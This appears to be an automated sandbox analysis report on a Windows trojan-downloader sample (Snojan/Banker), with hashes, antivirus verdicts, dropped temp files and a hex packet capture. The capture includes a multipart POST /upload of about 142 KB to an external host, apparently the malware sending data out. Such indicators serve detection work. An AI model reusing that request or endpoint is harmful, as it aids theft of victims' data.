| Field | Value |
|---|---|
| Analysis Date | 2018-04-17 21:46:33 |
| MD5 | 5d92c65a7882b1a206a16b413b893a8a |
| SHA1 | 680d5157871bd41bab6c490fa8fae2807823f1dd |
Static Details:
| Property | Value |
|---|---|
| File type | PE32 executable (console) Intel 80386 (stripped to external PDB), for MS Windows |
| PEhash | |

| Type | Engine | Result |
|---|---|---|
| AV | Arcabit (arcavir) | Trojan.GenericKD.30606265 |
| AV | Authentium | W32/S-f9d51e84!Eldorado |
| AV | Grisoft (avg) | No Virus |
| AV | Avira (antivir) | TR/Spy.Banker.axzdc |
| AV | Alwil (avast) | Banker-LAA [Trj] |
| AV | Ad-Aware | Trojan.GenericKD.30606265 |
| AV | BitDefender | Trojan.GenericKD.30606265 |
| AV | BullGuard | Trojan.GenericKD.30606265 |
| AV | ClamAV | No Virus |
| AV | Dr. Web | Tool.Snojan.1 |
| AV | Emsisoft | Trojan.GenericKD.30606265 |
| AV | MicroWorld (escan) | Application.Agent.BPO |
| AV | CA (E-Trust Ino) | No Virus |
| AV | Fortinet | Riskware/Snojan |
| AV | Frisk (f-prot) | W32/S-f9d51e84!Eldorado |
| AV | F-Secure | Trojan.GenericKD.30606265 |
| AV | Ikarus | Downloader.Snojan |
| AV | K7 | Trojan ( 0052706d1 ) |
| AV | Kaspersky | Downloader.Win32.Snojan.eiqu |
| AV | MalwareBytes | No Virus |
| AV | Mcafee | GenericRXEO-OL!5D92C65A7882 |
| AV | Microsoft Security Essentials | No Virus |
| AV | NANO | Trojan.Win32.Snojan.evvppm |
| AV | Eset (nod32) | No Virus |
| AV | Padvish | No Virus |
| AV | CAT (quickheal) | Trojan.Snojan.S1829144 |
| AV | Rising | No Virus |
| AV | 360 Safe | No Virus |
| AV | SUPERAntiSpyware | No Virus |
| AV | Symantec | SMG.Heur!gen |
| AV | Trend Micro | No Virus |
| AV | Twister | Generik.HWSOMXU.ceqp |
| AV | VirusBlokAda (vba32) | Downloader.Snojan |
| AV | Windows Defender | No Virus |
| AV | Zillya! | Trojan.GenericKD.Win32.100891 |
Runtime Details:
Process
↳ C:\Windows\System32\lsass.exe
Process
↳ C:\Users\Phil\AppData\Local\Temp\680d5157871bd41bab6c490fa8fae2807823f1dd.exe
| Event | Path |
|---|---|
| Creates File | C:\Users\Phil\AppData\Local\Temp\680d5157871bd41bab6c490fa8fae2807823f1dd.exe |
| Creates File | C:\Users\Phil\AppData\Local\Temp\rifaien2-jVmkPdw9e2j603t7.exe |
| Creates File | C:\Users\Phil\AppData\Local\Temp\rifaien2-jVmkPdw9e2j603t7.exe |
Network Details:
Raw Pcap
```text
0x00000000 (00000) 47455420 2f6e6373 692e7478 74204854  GET /ncsi.txt HT
0x00000010 (00016) 54502f31 2e310d0a 436f6e6e 65637469  TP/1.1..Connecti
0x00000020 (00032) 6f6e3a20 436c6f73 650d0a55 7365722d  on: Close..User-
0x00000030 (00048) 4167656e 743a204d 6963726f 736f6674  Agent: Microsoft
0x00000040 (00064) 204e4353 490d0a48 6f73743a 20777777   NCSI..Host: www
0x00000050 (00080) 2e6d7366 746e6373 692e636f 6d0d0a0d  .msftncsi.com...
0x00000060 (00096) 0a                                   .

0x00000000 (00000) 47455420 2f6e6373 692e7478 74204854  GET /ncsi.txt HT
0x00000010 (00016) 54502f31 2e310d0a 436f6e6e 65637469  TP/1.1..Connecti
0x00000020 (00032) 6f6e3a20 436c6f73 650d0a55 7365722d  on: Close..User-
0x00000030 (00048) 4167656e 743a204d 6963726f 736f6674  Agent: Microsoft
0x00000040 (00064) 204e4353 490d0a48 6f73743a 20777777   NCSI..Host: www
0x00000050 (00080) 2e6d7366 746e6373 692e636f 6d0d0a0d  .msftncsi.com...
0x00000060 (00096) 0a                                   .

0x00000000 (00000) 504f5354 202f7570 6c6f6164 20485454  POST /upload HTT
0x00000010 (00016) 502f312e 310d0a48 6f73743a 20776563  P/1.1..Host: wec
0x00000020 (00032) 616e2e68 61737468 652e7465 63686e6f  an.hasthe.techno
0x00000030 (00048) 6c6f6779 0d0a4163 63657074 3a202a2f  logy..Accept: */
0x00000040 (00064) 2a0d0a43 6f6e7465 6e742d4c 656e6774  *..Content-Lengt
0x00000050 (00080) 683a2031 34323735 360d0a45 78706563  h: 142756..Expec
0x00000060 (00096) 743a2031 30302d63 6f6e7469 6e75650d  t: 100-continue.
0x00000070 (00112) 0a436f6e 74656e74 2d547970 653a206d  .Content-Type: m
0x00000080 (00128) 756c7469 70617274 2f666f72 6d2d6461  ultipart/form-da
0x00000090 (00144) 74613b20 626f756e 64617279 3d2d2d2d  ta; boundary=---
0x000000a0 (00160) 2d2d2d2d 2d2d2d2d 2d2d2d2d 2d2d2d2d  ----------------
0x000000b0 (00176) 2d2d2d2d 2d393132 61366532 35376131  -----912a6e257a1
0x000000c0 (00192) 35653065 350d0a0d 0a                 5e0e5....

0x00000000 (00000) 504f5354 202f3365 31363236 34372d63  POST /3e162647-c
0x00000010 (00016) 3364382d 34346333 2d393937 622d3061  3d8-44c3-997b-0a
0x00000020 (00032) 63396135 66363838 33322f20 48545450  c9a5f68832/ HTTP
0x00000030 (00048) 2f312e31 0d0a4361 6368652d 436f6e74  /1.1..Cache-Cont
0x00000040 (00064) 726f6c3a 206e6f2d 63616368 650d0a43  rol: no-cache..C
0x00000050 (00080) 6f6e6e65 6374696f 6e3a2043 6c6f7365  onnection: Close
0x00000060 (00096) 0d0a5072 61676d61 3a206e6f 2d636163  ..Pragma: no-cac
0x00000070 (00112) 68650d0a 436f6e74 656e742d 54797065  he..Content-Type
0x00000080 (00128) 3a206170 706c6963 6174696f 6e2f736f  : application/so
0x00000090 (00144) 61702b78 6d6c0d0a 55736572 2d416765  ap+xml..User-Age
0x000000a0 (00160) 6e743a20 57534441 50490d0a 436f6e74  nt: WSDAPI..Cont
0x000000b0 (00176) 656e742d 4c656e67 74683a20 3733330d  ent-Length: 733.
0x000000c0 (00192) 0a486f73 743a2031 39322e31 36382e31  .Host: 192.168.1
0x000000d0 (00208) 30302e31 34323a35 3335370d 0a0d0a3c  00.142:5357....<
0x000000e0 (00224) 3f786d6c 20766572 73696f6e 3d22312e  ?xml version="1.
0x000000f0 (00240) 30222065 6e636f64 696e673d 22757466  0" encoding="utf
0x00000100 (00256) 2d38223f 3e3c736f 61703a45 6e76656c  -8"?><soap:Envel
0x00000110 (00272) 6f706520 786d6c6e 733a736f 61703d22  ope xmlns:soap="
0x00000120 (00288) 68747470 3a2f2f77 77772e77 332e6f72  http://www.w3.or
0x00000130 (00304) 672f3230 30332f30 352f736f 61702d65  g/2003/05/soap-e
0x00000140 (00320) 6e76656c 6f706522 20786d6c 6e733a77  nvelope" xmlns:w
0x00000150 (00336) 73613d22 68747470 3a2f2f73 6368656d  sa="http://schem
0x00000160 (00352) 61732e78 6d6c736f 61702e6f 72672f77  as.xmlsoap.org/w
0x00000170 (00368) 732f3230 30342f30 382f6164 64726573  s/2004/08/addres
0x00000180 (00384) 73696e67 2220786d 6c6e733a 6c6d733d  sing" xmlns:lms=
0x00000190 (00400) 22687474 703a2f2f 73636865 6d61732e  "http://schemas.
0x000001a0 (00416) 6d696372 6f736f66 742e636f 6d2f7769  microsoft.com/wi
0x000001b0 (00432) 6e646f77 732f6c6d 732f3230 30372f30  ndows/lms/2007/0
0x000001c0 (00448) 38223e3c 736f6170 3a486561 6465723e  8"><soap:Header>
0x000001d0 (00464) 3c777361 3a546f3e 75726e3a 75756964  <wsa:To>urn:uuid
0x000001e0 (00480) 3a336531 36323634 372d6333 64382d34  :3e162647-c3d8-4
0x000001f0 (00496) 3463332d 39393762 2d306163 39613566  4c3-997b-0ac9a5f
0x00000200 (00512) 36383833 323c2f77 73613a54 6f3e3c77  68832</wsa:To><w
0x00000210 (00528) 73613a41 6374696f 6e3e6874 74703a2f  sa:Action>http:/
0x00000220 (00544) 2f736368 656d6173 2e786d6c 736f6170  /schemas.xmlsoap
0x00000230 (00560) 2e6f7267 2f77732f 32303034 2f30392f  .org/ws/2004/09/
0x00000240 (00576) 7472616e 73666572 2f476574 3c2f7773  transfer/Get</ws
0x00000250 (00592) 613a4163 74696f6e 3e3c7773 613a4d65  a:Action><wsa:Me
0x00000260 (00608) 73736167 6549443e 75726e3a 75756964  ssageID>urn:uuid
0x00000270 (00624) 3a666531 66363065 352d3733 30332d34  :fe1f60e5-7303-4
0x00000280 (00640) 3864622d 39333230 2d393031 38363964  8db-9320-901869d
0x00000290 (00656) 33643733 613c2f77 73613a4d 65737361  3d73a</wsa:Messa
0x000002a0 (00672) 67654944 3e3c7773 613a5265 706c7954  geID><wsa:ReplyT
0x000002b0 (00688) 6f3e3c77 73613a41 64647265 73733e68  o><wsa:Address>h
0x000002c0 (00704) 7474703a 2f2f7363 68656d61 732e786d  ttp://schemas.xm
0x000002d0 (00720) 6c736f61 702e6f72 672f7773 2f323030  lsoap.org/ws/200
0x000002e0 (00736) 342f3038 2f616464 72657373 696e672f  4/08/addressing/
0x000002f0 (00752) 726f6c65 2f616e6f 6e796d6f 75733c2f  role/anonymous</
0x00000300 (00768) 7773613a 41646472 6573733e 3c2f7773  wsa:Address></ws
0x00000310 (00784) 613a5265 706c7954 6f3e3c77 73613a46  a:ReplyTo><wsa:F
0x00000320 (00800) 726f6d3e 3c777361 3a416464 72657373  rom><wsa:Address
0x00000330 (00816) 3e75726e 3a757569 643a6462 32313261  >urn:uuid:db212a
0x00000340 (00832) 37332d38 6561632d 34636462 2d613962  73-8eac-4cdb-a9b
0x00000350 (00848) 352d6237 66323833 63633438 30613c2f  5-b7f283cc480a</
0x00000360 (00864) 7773613a 41646472 6573733e 3c2f7773  wsa:Address></ws
0x00000370 (00880) 613a4672 6f6d3e3c 6c6d733a 4c617267  a:From><lms:Larg
0x00000380 (00896) 654d6574 61646174 61537570 706f7274  eMetadataSupport
0x00000390 (00912) 2f3e3c2f 736f6170 3a486561 6465723e  /></soap:Header>
0x000003a0 (00928) 3c736f61 703a426f 64792f3e 3c2f736f  <soap:Body/></so
0x000003b0 (00944) 61703a45 6e76656c 6f70653e           ap:Envelope>
```
Strings